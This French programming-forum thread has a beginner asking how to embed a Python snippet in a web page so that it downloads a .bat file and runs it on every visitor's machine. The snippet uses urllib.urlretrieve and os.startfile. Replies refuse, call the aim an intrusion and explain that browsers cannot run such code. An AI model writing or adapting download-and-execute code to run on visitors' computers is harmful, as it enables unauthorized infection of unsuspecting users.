IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Déploiement/Installation Python Discussion :

Intégrer script python sur ma page web


Sujet :

Déploiement/Installation Python

  1. #1
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2011
    Messages
    6
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Étudiant
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Août 2011
    Messages : 6
    Points : 5
    Points
    5
    Par défaut Intégrer script python sur ma page web
    Bonjour, je suis nouveau et je debute en python, je ne sais pas si je post dans la bonne catégorie mais je voudrais savoir si vous pouviez m'aider a installer se script sur une page web .html :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    import urllib
    import os
    urllib.urlretrieve('http://monappli.bat', 'c:/appli.bat')
    os.startfile('c:/appli.bat')
    Je voudrais que dès que la personne va sur ma page web, cela télécharge mon fichier bat à un endroit et qu'après sa lance se fichier.

  2. #2
    Expert éminent
    Avatar de fred1599
    Homme Profil pro
    Lead Dev Python
    Inscrit en
    Juillet 2006
    Messages
    3 823
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : Lead Dev Python
    Secteur : Arts - Culture

    Informations forums :
    Inscription : Juillet 2006
    Messages : 3 823
    Points : 7 119
    Points
    7 119
    Par défaut
    ça serait trop facile, on rentre pas dans un PC contre la volonté d'une personne.

    Ensuite, faut-il que cette personne est python pour l'exécuter.
    Celui qui trouve sans chercher est celui qui a longtemps cherché sans trouver.(Bachelard)
    La connaissance s'acquiert par l'expérience, tout le reste n'est que de l'information.(Einstein)

  3. #3
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2011
    Messages
    6
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Étudiant
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Août 2011
    Messages : 6
    Points : 5
    Points
    5
    Par défaut
    A je croyais car j'ai trouvé la source python d'un proxy sur internet, il ne fallait pas obligatoirement python pour l'executer, et le proxy utilisé des commandes python quand la personne cliquer sur un bouton input.

  4. #4
    Nouveau membre du Club
    Profil pro
    Inscrit en
    Juillet 2006
    Messages
    25
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juillet 2006
    Messages : 25
    Points : 30
    Points
    30
    Par défaut
    du fait que python soir exclusivement interprété, il n'est pas possible d’exécuter du python sur un ordinateur sans interpréteur. même py2exe embarque un interpréteur pour chaque programme.

    quant a exécuter du python dans une page web, j'imagine que tu confond avec javascript. toujours pour des raison d’interpréteur, tant que le navigateur n'aura pas d’interpréteur python, impossible de lui faire exécuter ton code.

    et enfin, pour des raison de sécurité évidente, un navigateur ne te laisse pas libre cours a tes moindre desirs. impossible de lui faire faire des modification sur l'ordinateur client avec un simple script.

    donc, tu t'enfonce le brase jusque dans la gorge, par ce que premièrement, python est loin d'etre indiqué pour faire des virus, ensuite, un navigateur n'est pas le top pour effectuer des modif sur la machine.

    je te conseil de commencer "petit" avant de vouloir infecter tout les visiteurs de ton "site".

    si une bombe fork est amusante a coder pour debuter, c'est pas évident a partager.

Discussions similaires

  1. Afficher les réponses d'un script python sur un page web
    Par Gregzz dans le forum Réseau/Web
    Réponses: 8
    Dernier message: 06/08/2010, 12h48
  2. intégrer une vidéo ou bien d'audio sur une page web
    Par aefmaaradji dans le forum Langage
    Réponses: 10
    Dernier message: 19/07/2008, 01h12
  3. Appliquer un script sur une page web
    Par GoldenEyes dans le forum Qt
    Réponses: 3
    Dernier message: 09/06/2008, 18h03
  4. Intégrer un script python dans une page Web
    Par Mysti¢ dans le forum Réseau/Web
    Réponses: 4
    Dernier message: 02/11/2006, 10h20
  5. Réponses: 2
    Dernier message: 19/12/2005, 13h15

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo